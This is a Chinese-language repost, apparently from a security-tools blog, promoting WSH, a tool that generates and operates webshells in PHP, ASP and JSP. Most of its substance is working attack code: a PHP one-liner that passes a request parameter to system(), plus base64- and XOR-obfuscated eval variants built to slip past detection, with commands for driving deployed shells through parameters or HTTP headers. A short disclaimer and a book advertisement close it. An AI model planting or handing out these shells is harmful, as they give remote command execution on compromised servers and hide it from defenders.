WebShell生成器和命令行接口工具 -- WSH
2022-10-5 08:5:8 Author: Web安全工具库(查看原文) 阅读量:11 收藏

===================================

免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。

0x01 工具介绍

该客户端具有命令历史记录、日志记录,并且可以配置为使用表单/按钮与先前部署的标准 webshell 交互。生成器在 php、asp 和 jsp 中创建 webshell。它们是用随机变量生成的,因此每个变量都有一个唯一的哈希值。它们可以配置白名单、密码,并允许通过自定义标头和参数发送命令。欢迎关注公众号web安全工具库,生成器和客户端可以通过命令行标志或配置文件进行配置,以允许保存适合您的设置,而无需执行我所谓的“--help”舞蹈。配置后,客户端和生成器使用相同的配置文件。

0x02 安装与使用

1、以下命令生成一个简单的 php web shell 并与之交互。

$ wsh generate php --param cmd --no-file -o shell.phpCreated shell at shell.php.$ wsh 127.0.0.1:8080/shell.php --param cmd
<?php $MfOb = $_REQUEST['cmd']; $MfOb = trim($MfOb); system($MfOb); die;?>

2、命令也可以通过 http 标头发送

$ wsh generate php --no-file --header user-agent  -o shell.phpCreated shell at shell.php.
$ wsh 127.0.0.1:8080/shell.php --header user-agent

3、Base64 / XOR 加密

$ wsh g php --param cmd --no-file --base64<?phpeval(base64_decode('JEZISENTPSRfUkVRVUVTVFsnY21kJ107JEZISENTPXRyaW0oJEZISENTKTtzeXN0ZW0oJEZISENTKTtkaWU7'))?>
$ wsh g php --param cmd --no-file --xor-key S3cr3tK3y --xor-param X-Key<?php$KHhx = $_REQUEST["X-Key"];$LqC = base64_decode("d2MPPUdJb2wrFmI2N2AgEBQaPldELwhQG182Jw4XAFoZYxcpP3wXWwgHMkANNl5LVmMYBEdQaFcKFwg=");$oooqt = "";for($YpuI=0; $YpuI<strlen($LqC); ) { for($cMq=0; ($cMq<strlen($KHhx) && $YpuI<strlen($LqC)); $cMq++,$YpuI++) { $oooqt .= $LqC{ $YpuI } ^ $KHhx{ $cMq }; }}eval($oooqt);?>

0x03 项目链接下载

1、通过阅读原文,到项目地址下载

2、欢迎关注公众号"web安全工具库"

· 推 荐 阅 读 ·

《C++20实践入门(第6版)》

本书抽丝剥茧地呈现C++20的诸多新特性,如模块、概念、范围和太空飞船运算符等。即使不具备编程经验,你也可在本书的指引下,快速在一个较新的C++编译器上编写出真正可用的C++程序。


文章来源: http://mp.weixin.qq.com/s?__biz=MzI4MDQ5MjY1Mg==&mid=2247504927&idx=1&sn=28739ff47425f02606443b45003554eb&chksm=ebb53b1cdcc2b20af68497f01cd78c82dba253e10b45de93e3f88e16c359fce6b00fbc51ede6#rd
如有侵权请联系:admin#unsafe.sh